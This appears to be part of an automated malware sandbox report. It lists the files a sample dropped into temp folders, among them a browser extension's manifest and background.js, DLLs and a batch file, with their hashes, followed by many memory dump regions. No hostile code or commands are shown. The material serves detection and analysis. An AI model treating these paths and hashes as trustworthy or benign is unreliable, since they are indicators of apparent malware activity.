SHA256a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA5127110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx\icons\icon-34.pngFilesize
3KB
MD5ca00972a17d51a3e6a28cfc8711474e4
SHA1c806ba3bcfb0b785aa4804843d332f425c66b7e0
SHA256fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA5129731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx\js\background.jsFilesize
108KB
MD5432c4c1300ba1c077fbd681f9667a104
SHA133482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
SHA5120ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx\manifest.jsonFilesize
438B
MD51d47eb945d1299c0e53bcada476d32b3
SHA1509f9041f7e2a14402915feb4f2a739cfac5636b
SHA2560a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a
SHA5126d20d3855225ee48373ee1ae19d5cecf90951a507c9c1d23d86fe0bb4f73def9545f0fd18ce821a3d63fa636b06d08a52a41c0f3a3cb2edc20d8ef92919b4258
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\shlwapi.dllFilesize
48KB
MD54cac70c3fdb075424b58b220b4835c09
SHA1651e43187c41994fd8f58f11d8011c4064388c89
SHA2564094f54853d9eea9fb628e2207cd95042bae089711908d1c8ed189fad9448e2b
SHA512810e97be3d47c67449a6049b52578f4f8dd829b62d015dde39c2a2381c481625540f945e06224b9c74e0deac089f6cd352f53343170138778c1f9e62e7518963
-
C:\Users\Admin\AppData\Local\Temp\nst5035.tmp\INetC.dllFilesize
25KB
MD540d7eca32b2f4d29db98715dd45bfac5
SHA1124df3f617f562e46095776454e1c0c7bb791cc7
SHA25685e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA5125fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d
-
C:\Users\Admin\AppData\Local\Temp\nst5035.tmp\abc.batFilesize
735B
MD5f79d850a439815f276773a85f654511d
SHA142c4b202b7122ce48bb17975cf0a5be337d09fec
SHA25631b4234965ffbff8d8a2d9dc8876d2edb1ba4eb44f482fedad5ed16284f872ff
SHA5125ea67fac41596652b0eeaf1f8d4e01fb6d2f2495c7e7185c22e7cac5187d3fc5d02e1649710c0ef30419c6b2805c4d947cf39eab5f31d8f0b72cf3e37e3a507c
-
memory/764-386-0x0000000000400000-0x000000000072C000-memory.dmpFilesize
3.2MB
-
memory/836-69-0x0000000000670000-0x0000000000671000-memory.dmpFilesize
4KB
-
memory/836-71-0x0000000000670000-0x0000000000671000-memory.dmpFilesize
4KB
-
memory/1412-73-0x0000000000400000-0x0000000002350000-memory.dmpFilesize
31.3MB
-
memory/2012-2-0x0000000000861000-0x000000000088F000-memory.dmpFilesize
184KB
-
memory/2012-0-0x0000000000860000-0x0000000000D0A000-memory.dmpFilesize
4.7MB
-
memory/2012-1-0x0000000077736000-0x0000000077738000-memory.dmpFilesize
8KB
-
memory/2012-17-0x0000000000860000-0x0000000000D0A000-memory.dmpFilesize
4.7MB
-
memory/2012-3-0x0000000000860000-0x0000000000D0A000-memory.dmpFilesize
4.7MB
-
memory/2012-5-0x0000000000860000-0x0000000000D0A000-memory.dmpFilesize
4.7MB
-
memory/2148-124-0x0000000007300000-0x000000000797A000-memory.dmpFilesize
6.5MB
-
memory/2148-125-0x0000000005FC0000-0x0000000005FDA000-memory.dmpFilesize
104KB
-
memory/2148-110-0x0000000004E10000-0x0000000004E32000-memory.dmpFilesize
136KB
-
memory/2148-121-0x0000000005620000-0x0000000005977000-memory.dmpFilesize
3.3MB
-
memory/2148-111-0x0000000005540000-0x00000000055A6000-memory.dmpFilesize
408KB
-
memory/2148-108-0x00000000025F0000-0x0000000002626000-memory.dmpFilesize
216KB
-
memory/2148-112-0x00000000055B0000-0x0000000005616000-memory.dmpFilesize
408KB
-
memory/2148-123-0x0000000005B00000-0x0000000005B4C000-memory.dmpFilesize
304KB
-
memory/2148-122-0x0000000005AB0000-0x0000000005ACE000-memory.dmpFilesize
120KB
-
memory/2148-109-0x0000000004EA0000-0x00000000054CA000-memory.dmpFilesize
6.2MB
-
memory/2192-149-0x0000000005EA0000-0x00000000061F7000-memory.dmpFilesize
3.3MB
-
memory/2192-161-0x00000000069C0000-0x0000000006A0C000-memory.dmpFilesize
304KB
-
memory/2384-70-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/2384-72-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/2824-409-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/2824-410-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-396-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-405-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-19-0x0000000000B71000-0x0000000000B9F000-memory.dmpFilesize
184KB
-
memory/4560-20-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-21-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-162-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-414-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-391-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-392-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-393-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-394-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-395-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-413-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-412-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-411-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-401-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-402-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-403-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-404-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-18-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4560-406-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4616-139-0x0000000006B00000-0x0000000006B4C000-memory.dmpFilesize
304KB
-
memory/4616-137-0x0000000006010000-0x0000000006367000-memory.dmpFilesize
3.3MB
-
memory/4808-400-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4808-398-0x0000000000B70000-0x000000000101A000-memory.dmpFilesize
4.7MB
-
memory/4872-144-0x0000000000400000-0x00000000004E9000-memory.dmpFilesize
932KB
-
memory/4872-387-0x0000000000400000-0x00000000004E9000-memory.dmpFilesize
932KB